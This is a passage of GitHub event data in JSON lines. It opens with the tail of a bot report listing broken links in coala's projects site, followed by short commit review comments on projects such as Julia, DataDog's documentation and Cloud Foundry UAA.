https://en.wikipedia.org/wiki/Lint_(software) | _projects/use_coala_2.md | 53 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Continuous_integration | _projects/use_coala_2.md | 54 |\n| Broken link - unable to connect to http://coala.readthedocs.io/en/latest/Users/Docker_Image.html#coala-on-travis-ci | _projects/use_coala_2.md | 104 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Snake_case | _projects/use_coala_2.md | 126 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/coala | _projects/use_coala_2.md | 270 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/continuous-integration | _projects/use_coala_2.md | 271 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/lint | _projects/use_coala_2.md | 272 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/static-analysis | _projects/use_coala_2.md | 273 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/git | _projects/use_coala_2.md | 274 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/github | _projects/use_coala_2.md | 275 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/travis-ci | _projects/use_coala_2.md | 276 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/docker | _projects/use_coala_2.md | 277 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/bash | _projects/use_coala_2.md | 278 |\n| Broken link - unable to connect to https://api.coala.io/en/latest/Developers/Writing_Linter_Bears.html | data/locale/en/projects/automate_dependency_repology.md | 52 |\n| Broken link - unable to connect to https://cloud.githubusercontent.com/assets/15556382/26275557/580cae2c-3d81-11e7-89ed-ac1ccbf9dc26.png | data/locale/en/projects/vulture.md | 41 |\n| Broken link - unable to connect to https://bitbucket.org/m0hawk | data/locale/en/projects/vulture.md | 90 |\n| Broken link - unable to connect to https://docs.google.com/document/d/1gzRH-rdJsiAD-TOEB0O4OqtcnTp0zotcNl6agAuXGHw/edit?usp=sharing | data/locale/en/projects/vulture.md | 134 |\n| Broken link - unable to connect to https://www.travisbuddy.com/ | .travis.yml | 21 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/debug_profile.md | 20 |\n| Broken link - unable to connect to https://docs.python.org/3.4/library/pdb.html | _projects/debug_profile.md | 57 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/debug_profile.md | 58 |\n| Broken link - unable to connect to https://api.coala.io/en/latest/Developers/Writing_Linter_Bears.html | data/locale/en/projects/go_bears_on_bsd.md | 102 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/contact_mentor.md | 4 |\n| Broken link - unable to connect to https://hubot.github.com | _projects/cobot_enhancement.md | 42 |\n| Broken link - unable to connect to http://errbot.io | _projects/cobot_enhancement.md | 46 |\n| Broken link - unable to connect to https://meetmangukiya.github.io/GSoC_cobot_enhancement.pdf | _projects/cobot_enhancement.md | 63 |\n| Broken link - unable to connect to https://gitmate.io/ | _projects/gitmate_plugins.md | 29 |\n| Broken link - unable to connect to https://igitt.gitmate.io/index.html | _projects/gitmate_plugins.md | 33 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Newcomers_Guide/ | _projects/gitmate_plugins.md | 37 |\n| Broken link - unable to connect to https://coala.io | reports/meetmangukiya.md | 6 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#4913450777051136 | reports/meetmangukiya.md | 8 |\n| Broken link - unable to connect to https://rawgit.com/meetmangukiya/GSoCReport/master/patches.tar | reports/meetmangukiya.md | 9 |\n| Broken link - unable to connect to https://coala.io | reports/meetmangukiya.md | 19 |\n| Broken link - unable to connect to https://hubot.github.com/ | reports/meetmangukiya.md | 20 |\n| Broken link - unable to connect to http://errbot.io | reports/meetmangukiya.md | 21 |\n| Broken link - unable to connect to https://gitter.im/meetmangukiya | reports/meetmangukiya.md | 32 |\n| Broken link - unable to connect to https://meetmangukiya.github.io/ | reports/meetmangukiya.md | 34 |\n| Broken link - unable to connect to https://pdfs.semanticscholar.org/57dc/e89754ad37b1a631e4ac6f375ce9cae3988e.pdf | reports/meetmangukiya.md | 756 |\n| Broken link - unable to connect to http://docutils.sourceforge.net/ | _projects/rstcheck_with_better_sphinx_support.md | 30 |\n| Broken link - unable to connect to http://www.sphinx-doc.org | _projects/rstcheck_with_better_sphinx_support.md | 40 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/is_mentor_necessary.md | 12 |\n| Broken link - unable to connect to https://developers.google.com/open-source/gsoc/faq#what_are_the_eligibility_requirements_for_participation | _faq/gsoc_requirements.md | 4 |\n| Broken link - unable to connect to https://coala.io/newcomer | _faq/gsoc_requirements.md | 6 |\n| Broken link - unable to connect to https://coala.io/usability | _faq/gsoc_requirements.md | 7 |\n| Broken link - unable to connect to http://coala.io/thesis | data/locale/en/faq/thesis.md | 10 |\n| Broken link - unable to connect to https://codein.withgoogle.com/dashboard/tasks/6236781315883008/ | _projects/use_coala_3.md | 21 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Lint_(software) | _projects/use_coala_3.md | 34 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Continuous_integration | _projects/use_coala_3.md | 35 |\n| Broken link - unable to connect to https://gitter.im/coala/coala | _projects/use_coala_3.md | 150 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/coala | _projects/use_coala_3.md | 194 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/continuous-integration | _projects/use_coala_3.md | 195 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/lint | _projects/use_coala_3.md | 196 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/static-analysis | _projects/use_coala_3.md | 197 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/git | _projects/use_coala_3.md | 198 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/github | _projects/use_coala_3.md | 199 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/travis-ci | _projects/use_coala_3.md | 200 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/docker | _projects/use_coala_3.md | 201 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/bash | _projects/use_coala_3.md | 202 |\n| Broken link - unable to connect to https://hubot.github.com | data/locale/en/projects/cobot_enhancement.md | 42 |\n| Broken link - unable to connect to http://errbot.io | data/locale/en/projects/cobot_enhancement.md | 46 |\n| Broken link - unable to connect to https://meetmangukiya.github.io/GSoC_cobot_enhancement.pdf | data/locale/en/projects/cobot_enhancement.md | 63 |\n| Broken link - unable to connect to https://developers.google.com/open-source/gsoc/timeline | _faq/coala_will_apply_for_gsoc_2018.md | 4 |\n| Broken link - unable to connect to https://www.dartlang.org/install | data/locale/en/projects/improve_installation.md | 77 |\n| Broken link - unable to connect to https://coala.io/cep5 | data/locale/en/projects/implement_aspects.md | 105 |\n| Broken link - unable to connect to https://coala.io | reports/satwikkansal.md | 6 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#4853947354316800 | reports/satwikkansal.md | 8 |\n| Broken link - unable to connect to https://rawgit.com/satwikkansal/GSoC-Report/master/patches.tar | reports/satwikkansal.md | 9 |\n| Broken link - unable to connect to https://gitter.im/satwikkansal | reports/satwikkansal.md | 29 |\n| Broken link - unable to connect to https://coala.io | reports/satwikkansal.md | 251 |\n| Broken link - unable to connect to http://api.coala.io/en/latest/Developers/Writing_Native_Bears.html#can-detect-and-can-fix | reports/satwikkansal.md | 268 |\n| Broken link - unable to connect to https://pypi.python.org/pypi/coala-quickstart/0.4.0 | reports/satwikkansal.md | 277 |\n| Broken link - unable to connect to http://gitmate.io | _projects/gitmate_gitlab.md | 70 |\n| Broken link - unable to connect to https://bitbucket.org/product | _projects/gitmate_gitlab.md | 85 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#4985377849868288 | _projects/gitmate_gitlab.md | 90 |\n| Broken link - unable to connect to http://api.coala.io/en/latest/Developers/Writing_Linter_Bears.html | _projects/bear_updates.md | 37 |\n| Broken link - unable to connect to http://api.coala.io/en/latest/Developers/Writing_Linter_Bears.html | _projects/bear_updates.md | 55 |\n| Broken link - unable to connect to https://langserver.org/ | data/locale/en/projects/coala_language_server.md | 28 |\n| Broken link - unable to connect to http://langserver.org | data/locale/en/projects/coala_language_server.md | 159 |\n| Broken link - unable to connect to https://gitmate.io/ | data/locale/en/projects/gitmate_plugins.md | 29 |\n| Broken link - unable to connect to https://igitt.gitmate.io/index.html | data/locale/en/projects/gitmate_plugins.md | 33 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Newcomers_Guide/ | data/locale/en/projects/gitmate_plugins.md | 37 |\n| Broken link - unable to connect to https://bugs.launchpad.net/pyflakes/+bugs?field.tag=easy | _projects/integrate-pyflakes-AST.md | 19 |\n| Broken link - unable to connect to https://pypi.python.org/pypi/pyflakes | _projects/integrate-pyflakes-AST.md | 36 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Abstract_syntax_tree | _projects/integrate-pyflakes-AST.md | 37 |\n| Broken link - unable to connect to https://api.coala.io | _projects/integrate-pyflakes-AST.md | 51 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/enhance_coala_quickstart.md | 32 |\n| Broken link - unable to connect to http://coala.io/thesis | _faq/thesis.md | 10 |\n| Broken link - unable to connect to https://fedorahosted.org/dogtail/ | data/locale/en/projects/editor_support.md | 54 |\n| Broken link - unable to connect to https://docs.google.com/document/d/1BLZO2tD93yKdO7XhMb5NgJvytu-pWDtPMRidGmjQ8EY/edit?usp=sharing | _projects/improve_diff_handling.md | 52 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/improve_diff_handling.md | 151 |\n| Broken link - unable to connect to https://api.coala.io/ | _projects/improve_diff_handling.md | 161 |\n| Broken link - unable to connect to https://api.coala.io/ | _projects/improve_diff_handling.md | 174 |\n| Broken link - unable to connect to https://coala.io/cep5 | _projects/implement_aspects.md | 105 |\n| Broken link - unable to connect to https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js | _layouts/report.md | 8 |\n| Broken link - unable to connect to https://cdnjs.cloudflare.com/ajax/libs/materialize/0.100.1/css/materialize.min.css | _layouts/report.md | 10 |\n| Broken link - unable to connect to https://rawgit.com/coala/coalaCSS/master/coala.css | _layouts/report.md | 11 |\n| Broken link - unable to connect to https://cdnjs.cloudflare.com/ajax/libs/materialize/0.100.1/js/materialize.min.js | _layouts/report.md | 12 |\n| Broken link - unable to connect to https://fonts.googleapis.com/css?family=Roboto+Mono:300,300i,400,400i,700,700i | _layouts/report.md | 13 |\n| Broken link - unable to connect to https://fonts.googleapis.com/icon?family=Material+Icons | _layouts/report.md | 14 |\n| Broken link - unable to connect to https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css | _layouts/report.md | 15 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/organizations/6256279438229504/ | data/locale/en/projects/roberta_external_source.md | 26 |\n| Broken link - unable to connect to https://coala.io | reports/adhikasp.md | 6 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#5847850440196096 | reports/adhikasp.md | 8 |\n| Broken link - unable to connect to https://rawgit.com/adhikasp/GSoC-2017-Report/master/adhikasp_tarball.tar.gz | reports/adhikasp.md | 9 |\n| Broken link - unable to connect to http://github.com/jayvdb | reports/adhikasp.md | 11 |\n| Broken link - unable to connect to https://gitter.im/adhikasp | reports/adhikasp.md | 34 |\n| Broken link - unable to connect to https://adhikasp.github.io | reports/adhikasp.md | 36 |\n| Broken link - unable to connect to https://projects.coala.io | data/locale/en/README.md | 9 |\n| Broken link - unable to connect to https://jekyllrb.com/docs/installation/ | data/locale/en/README.md | 32 |\n| Broken link - unable to connect to https://jekyllrb.com/docs/troubleshooting/ | data/locale/en/README.md | 46 |\n| Broken link - unable to connect to http://gitmate.io | data/locale/en/projects/gitmate_gitlab.md | 70 |\n| Broken link - unable to connect to https://bitbucket.org/product | data/locale/en/projects/gitmate_gitlab.md | 85 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#4985377849868288 | data/locale/en/projects/gitmate_gitlab.md | 90 |\n| Broken link - unable to connect to https://www.riverbankcomputing.com/software/sip/intro | data/locale/en/projects/automate_vulture_whitelist.md | 34 |\n| Broken link - unable to connect to http://code.qt.io/cgit/pyside/pyside-setup.git/tree/sources/shiboken2 | data/locale/en/projects/automate_vulture_whitelist.md | 35 |\n| Broken link - unable to connect to http://code.qt.io/cgit/pyside/pyside-setup.git/tree/sources/shiboken2 | data/locale/en/projects/automate_vulture_whitelist.md | 81 |\n| Broken link - unable to connect to http://code.qt.io/cgit/pyside/pyside-setup.git/tree/sources/shiboken2 | data/locale/en/projects/automate_vulture_whitelist.md | 85 |\n| Broken link - unable to connect to http://coala.io/chat | _projects/use_coala.md | 18 |\n| Broken link - unable to connect to https://codein.withgoogle.com/dashboard/tasks/4705163153506304/ | _projects/use_coala.md | 24 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Lint_(software) | _projects/use_coala.md | 44 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Continuous_integration | _projects/use_coala.md | 45 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Travis_CI | _projects/use_coala.md | 50 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Docker_(software) | _projects/use_coala.md | 54 |\n| Broken link - unable to connect to https://help.github.com/articles/about-stars/ | _projects/use_coala.md | 65 |\n| Broken link - unable to connect to https://help.github.com/articles/about-pull-requests/ | _projects/use_coala.md | 67 |\n| Broken link - unable to connect to https://help.github.com/articles/advanced-search/ | _projects/use_coala.md | 72 |\n| Broken link - unable to connect to https://git-scm.com/docs/git-push | _projects/use_coala.md | 146 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Enter_key | _projects/use_coala.md | 153 |\n| Broken link - unable to connect to https://docs.google.com/spreadsheets/d/1qMUsupzK30MaM79Jnq8N9ZitZgG2g7ae08Q-f8ExTDQ/edit | _projects/use_coala.md | 180 |\n| Broken link - unable to connect to https://help.github.com/articles/fork-a-repo/ | _projects/use_coala.md | 193 |\n| Broken link - unable to connect to https://help.github.com/assets/images/help/repository/fork_button.jpg | _projects/use_coala.md | 194 |\n| Broken link - unable to connect to https://travis-ci.org/ | _projects/use_coala.md | 201 |\n| Broken link - unable to connect to https://travis-ci.org/profile | _projects/use_coala.md | 204 |\n| Broken link - unable to connect to https://docs.travis-ci.com/user/customizing-the-build | _projects/use_coala.md | 212 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/File_(command) | _projects/use_coala.md | 233 |\n| Broken link - unable to connect to https://travis-ci.org/jayvdb/sails-docs/builds/188699889 | _projects/use_coala.md | 250 |\n| Broken link - unable to connect to http://coala.readthedocs.io/en/latest/Users/Docker_Image.html | _projects/use_coala.md | 271 |\n| Broken link - unable to connect to https://travis-ci.org/ | _projects/use_coala.md | 312 |\n| Broken link - unable to connect to https://travis-ci.org/jayvdb/HC/builds/178769602 | _projects/use_coala.md | 317 |\n| Broken link - unable to connect to https://travis-ci.org/jayvdb/gci16.fossasia.org/builds/179832299 | _projects/use_coala.md | 318 |\n| Broken link - unable to connect to https://help.github.com/articles/editing-files-in-your-repository/ | _projects/use_coala.md | 376 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/coala | _projects/use_coala.md | 475 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/continuous-integration | _projects/use_coala.md | 476 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/lint | _projects/use_coala.md | 477 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/static-analysis | _projects/use_coala.md | 478 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/git | _projects/use_coala.md | 479 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/github | _projects/use_coala.md | 480 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/travis-ci | _projects/use_coala.md | 481 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/docker | _projects/use_coala.md | 482 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/bash | _projects/use_coala.md | 483 |\n| Broken link - unable to connect to http://coala.io/chat | data/locale/en/projects/use_coala.md | 18 |\n| Broken link - unable to connect to https://codein.withgoogle.com/dashboard/tasks/4705163153506304/ | data/locale/en/projects/use_coala.md | 24 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Lint_(software) | data/locale/en/projects/use_coala.md | 44 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Continuous_integration | data/locale/en/projects/use_coala.md | 45 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Travis_CI | data/locale/en/projects/use_coala.md | 50 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Docker_(software) | data/locale/en/projects/use_coala.md | 54 |\n| Broken link - unable to connect to https://help.github.com/articles/about-stars/ | data/locale/en/projects/use_coala.md | 65 |\n| Broken link - unable to connect to https://help.github.com/articles/about-pull-requests/ | data/locale/en/projects/use_coala.md | 67 |\n| Broken link - unable to connect to https://help.github.com/articles/advanced-search/ | data/locale/en/projects/use_coala.md | 72 |\n| Broken link - unable to connect to https://git-scm.com/docs/git-push | data/locale/en/projects/use_coala.md | 146 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Enter_key | data/locale/en/projects/use_coala.md | 153 |\n| Broken link - unable to connect to https://docs.google.com/spreadsheets/d/1qMUsupzK30MaM79Jnq8N9ZitZgG2g7ae08Q-f8ExTDQ/edit | data/locale/en/projects/use_coala.md | 180 |\n| Broken link - unable to connect to https://help.github.com/articles/fork-a-repo/ | data/locale/en/projects/use_coala.md | 193 |\n| Broken link - unable to connect to https://help.github.com/assets/images/help/repository/fork_button.jpg | data/locale/en/projects/use_coala.md | 194 |\n| Broken link - unable to connect to https://travis-ci.org/ | data/locale/en/projects/use_coala.md | 201 |\n| Broken link - unable to connect to https://travis-ci.org/profile | data/locale/en/projects/use_coala.md | 204 |\n| Broken link - unable to connect to https://docs.travis-ci.com/user/customizing-the-build | data/locale/en/projects/use_coala.md | 212 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/File_(command) | data/locale/en/projects/use_coala.md | 233 |\n| Broken link - unable to connect to https://travis-ci.org/jayvdb/sails-docs/builds/188699889 | data/locale/en/projects/use_coala.md | 250 |\n| Broken link - unable to connect to http://coala.readthedocs.io/en/latest/Users/Docker_Image.html | data/locale/en/projects/use_coala.md | 271 |\n| Broken link - unable to connect to https://travis-ci.org/ | data/locale/en/projects/use_coala.md | 312 |\n| Broken link - unable to connect to https://travis-ci.org/jayvdb/HC/builds/178769602 | data/locale/en/projects/use_coala.md | 317 |\n| Broken link - unable to connect to https://travis-ci.org/jayvdb/gci16.fossasia.org/builds/179832299 | data/locale/en/projects/use_coala.md | 318 |\n| Broken link - unable to connect to https://help.github.com/articles/editing-files-in-your-repository/ | data/locale/en/projects/use_coala.md | 376 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/coala | data/locale/en/projects/use_coala.md | 475 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/continuous-integration | data/locale/en/projects/use_coala.md | 476 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/lint | data/locale/en/projects/use_coala.md | 477 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/static-analysis | data/locale/en/projects/use_coala.md | 478 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/git | data/locale/en/projects/use_coala.md | 479 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/github | data/locale/en/projects/use_coala.md | 480 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/travis-ci | data/locale/en/projects/use_coala.md | 481 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/docker | data/locale/en/projects/use_coala.md | 482 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/bash | data/locale/en/projects/use_coala.md | 483 |\n| Broken link - unable to connect to https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js | index.html | 14 |\n| Broken link - unable to connect to https://ajax.googleapis.com/ajax/libs/angularjs/1.5.7/angular.min.js | index.html | 15 |\n| Broken link - unable to connect to https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.8/js/materialize.min.js | index.html | 16 |\n| Broken link - unable to connect to https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.0/angular-route.min.js | index.html | 17 |\n| Broken link - unable to connect to https://buttons.github.io/buttons.js | index.html | 18 |\n| Broken link - unable to connect to https://rawgit.com/coala/coalaCSS/master/coala.css | index.html | 26 |\n| Broken link - unable to connect to https://fonts.googleapis.com/css?family=Roboto+Mono:300,300i,400,400i,700,700i | index.html | 27 |\n| Broken link - unable to connect to https://fonts.googleapis.com/icon?family=Material+Icons | index.html | 28 |\n| Broken link - unable to connect to https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css | index.html | 29 |\n| Broken link - unable to connect to https://s3.amazonaws.com/github/ribbons/forkme_right_darkblue_121621.png | index.html | 34 |\n| Broken link - unable to connect to https://api.coala.io/en/latest/_static/images/coala_logo.svg | index.html | 61 |\n| Broken link - unable to connect to http://placehold.it/100x100 | index.html | 74 |\n\nUntil GitMate provides an online UI to show a better overview, you can run [coala](https://coala.io/) locally for more details."}},"created_at":"2018-07-10T15:05:00Z"}
{"id":"7944447188","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":29658213,"position":15,"line":363,"path":"src/cgutils.cpp","commit_id":"d8034721883dbd452123f8cf3bccb4285fd59f68","created_at":"2018-07-10T15:05:43Z","updated_at":"2018-07-10T15:05:43Z","author_association":"CONTRIBUTOR","body":"Is this comment stale now?"}},"created_at":"2018-07-10T15:05:43Z"}
{"id":"7944449105","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29658217,"position":null,"line":null,"path":null,"commit_id":"2600f0a40611325b41791228843db184a5c2e012","created_at":"2018-07-10T15:05:59Z","updated_at":"2018-07-10T15:05:59Z","author_association":"COLLABORATOR","body":"Created issue #801."}},"created_at":"2018-07-10T15:05:59Z"}
{"id":"7944459533","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"Riba0017/javascript"},"payload":{"comment":{"id":29658245,"position":46,"line":46,"path":"tenthLesson.js","commit_id":"3d7c3a2e8cdb5fcc7ee07da240bedb26d44bed7f","created_at":"2018-07-10T15:07:30Z","updated_at":"2018-07-10T15:07:30Z","author_association":"NONE","body":"45 строка ни к чему. можно сразу преобразовать строку и применить к ней метод **includes** \r\n`return str.toLowerCase().includes(comb.toLowerCase());`"}},"created_at":"2018-07-10T15:07:30Z"}
{"id":"7944462136","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658255,"position":15,"line":15,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:07:52Z","updated_at":"2018-07-10T15:07:52Z","author_association":"CONTRIBUTOR","body":"We should avoid the use of `will` as much as possible:\r\n\r\n `the vast majority of customers will leverage the agent.` => `the vast majority of customers leverage the agent`."}},"created_at":"2018-07-10T15:07:52Z"}
{"id":"7944462941","type":"CommitCommentEvent","actor":{"login":"strehle"},"repo":{"name":"cloudfoundry/uaa"},"payload":{"comment":{"id":29658257,"position":null,"line":null,"path":null,"commit_id":"0192d1d05e039136ae64944ed0afbbac9a06dd12","created_at":"2018-07-10T15:08:00Z","updated_at":"2018-07-10T15:08:00Z","author_association":"CONTRIBUTOR","body":"Hi,\r\n\r\nsee here: https://github.com/bmuschko/gradle-cargo-plugin/issues/99 and\r\nhttps://github.com/bmuschko/gradle-cargo-plugin/pull/138\r\n\r\ncurrently the integration tests fail because of \r\nERROR: transport error 202: could not find free port in debug port range: Transport endpoint is not connected\r\nJDWP exit error ERROR_unknown(510): could not listen [transport.c:616]\r\nERROR: JDWP could not listen, jvmtiError=ERROR_unknown(510)\r\n\r\nmaybe better to add an option similar to spring profiles ,e.g. to distinguesh database types something like localdebug in spring profiles and then add dynamically the debug option into jvmArgs.\r\n\r\nRight now all integration tests fail because each task is done with debug options and start / stop uses the same debug port... debugging is useful if a human is starting the test , but for travis debugging is not needed.\r\n\r\nregards,\r\n-markus"}},"created_at":"2018-07-10T15:08:00Z"}
{"id":"7944469124","type":"CommitCommentEvent","actor":{"login":"cswatt"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658277,"position":52,"line":52,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:08:56Z","updated_at":"2018-07-10T15:08:56Z","author_association":"CONTRIBUTOR","body":"Lowercase \"metadata.\""}},"created_at":"2018-07-10T15:08:56Z"}
{"id":"7944470057","type":"CommitCommentEvent","actor":{"login":"Sajo811"},"repo":{"name":"athena-network/athena-block-monitor"},"payload":{"comment":{"id":29658280,"position":null,"line":null,"path":null,"commit_id":"4053dedb77ee6309b64aa912f9a8e62867f38f3c","created_at":"2018-07-10T15:09:05Z","updated_at":"2018-07-10T15:09:05Z","author_association":"NONE","body":"This isn't a stray character lol, it's the shorthand way of formatting the string, rather than typing `.format(xyz=xyz)`. It formats `{timed}` with the value of the variable of that name.\r\n\r\ntldr; add that f' back!"}},"created_at":"2018-07-10T15:09:05Z"}
{"id":"7944470462","type":"CommitCommentEvent","actor":{"login":"ardentakshaya3"},"repo":{"name":"ardentakshaya3/akshaya.github.io"},"payload":{"comment":{"id":29658282,"position":null,"line":null,"path":null,"commit_id":"53c04414037b2ea357779025a6b401af376663f8","created_at":"2018-07-10T15:09:09Z","updated_at":"2018-07-10T15:09:09Z","author_association":"OWNER","body":"second commit"}},"created_at":"2018-07-10T15:09:09Z"}
{"id":"7944473285","type":"CommitCommentEvent","actor":{"login":"EmDevys"},"repo":{"name":"opengeospatial/geotiff"},"payload":{"comment":{"id":29658287,"position":null,"line":null,"path":null,"commit_id":"a690dc3fe5844bd0f839f9ad58a6672c91731c50","created_at":"2018-07-10T15:09:34Z","updated_at":"2018-07-10T15:09:34Z","author_association":"CONTRIBUTOR","body":"band definition\r\nSource ISO/TS 19101-2:2008: range of wavelengths of electromagnetic radiation that produce a   single response by a sensing device. (also correct the reference to ISO 19101-2:2008, 4.1)\r\n--\r\ncoverage: is this definition necessary? (it appears that it is unused). However the grid definition of ISO 19123 - Schema for coverage geometry and functions is used => Consider whether it is of interest to keep this definition\r\n\r\ngeocoding: add source ISO   19133:2005\r\n--\r\ngrid: there are 2 entries in the commit => 1st entry should be deleted\r\n--\r\northorectified grid: is this definition needed (of interest)? The definition of orthoimage is appears clearer, and is available in ISO 19101-2:2008: image in which by orthogonal projection to a reference surface,   displacement of image points due to sensor orientation and terrain relief has   been removed\r\n--\r\npixel: add reference to ISO/TS   19101-2:2008\r\n--\r\nrange <coverage>: is this definition necessary? (it appears that it is unused) => proposal to suppress this definition\r\n--\r\nreferenceable grid: is this definition necessary? (it appears that it is unused) => proposal to suppress this definition\r\n--\r\nrelative accuracy / relative positional accuracy: is this definition necessary? (it appears that it is unused) => proposal to suppress this definition\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-10T15:09:34Z"}
{"id":"7944475480","type":"CommitCommentEvent","actor":{"login":"McSinyx"},"repo":{"name":"t-rekttt/diemdaihoc"},"payload":{"comment":{"id":29658292,"position":null,"line":null,"path":null,"commit_id":"4bef449557e097c3602fc5ab7f7174512527373e","created_at":"2018-07-10T15:09:54Z","updated_at":"2018-07-10T15:09:54Z","author_association":"NONE","body":"I find this really amusing"}},"created_at":"2018-07-10T15:09:54Z"}
{"id":"7944476280","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658295,"position":19,"line":19,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:10:01Z","updated_at":"2018-07-10T15:10:01Z","author_association":"CONTRIBUTOR","body":"* Capitalise `Agent`\r\n\r\n* `meet PCI requirements, will need to use Agent v6 and set the ` => `meet PCI requirements, should use Agent v6 and set the ..`"}},"created_at":"2018-07-10T15:10:01Z"}
{"id":"7944479658","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658304,"position":23,"line":23,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:10:31Z","updated_at":"2018-07-10T15:10:31Z","author_association":"CONTRIBUTOR","body":"* capitalise `Agent`"}},"created_at":"2018-07-10T15:10:31Z"}
{"id":"7944481454","type":"CommitCommentEvent","actor":{"login":"Monika-Kumar"},"repo":{"name":"Monika-Kumar/monika.tech"},"payload":{"comment":{"id":29658308,"position":null,"line":null,"path":null,"commit_id":"60adab1e1e8b4fa55794098268ce5fc9b5c14798","created_at":"2018-07-10T15:10:47Z","updated_at":"2018-07-10T15:10:47Z","author_association":"OWNER","body":"mypic"}},"created_at":"2018-07-10T15:10:47Z"}
